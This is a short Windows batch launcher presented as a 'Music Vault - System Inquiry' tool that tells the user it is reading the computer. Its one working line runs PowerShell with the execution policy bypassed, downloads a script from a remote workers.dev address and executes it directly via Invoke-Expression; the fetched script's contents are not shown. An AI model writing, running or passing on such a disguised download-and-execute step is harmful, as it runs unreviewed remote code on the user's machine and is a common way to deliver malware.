@echo off
title Music Vault - System Inquiry
echo(
echo   ===============================================
echo    Music Vault - System Inquiry
echo   ===============================================
echo(
echo   Reading this computer (about a minute)... please wait.
echo(
powershell -NoProfile -ExecutionPolicy Bypass -Command "try{ irm 'https://mvr-inquiry.soundsciencecat.workers.dev/survey.ps1' | iex }catch{ Write-Host ('ERROR: '+$_.Exception.Message) -ForegroundColor Red }"
echo(
echo   All done - you can close this window.
echo(
pause
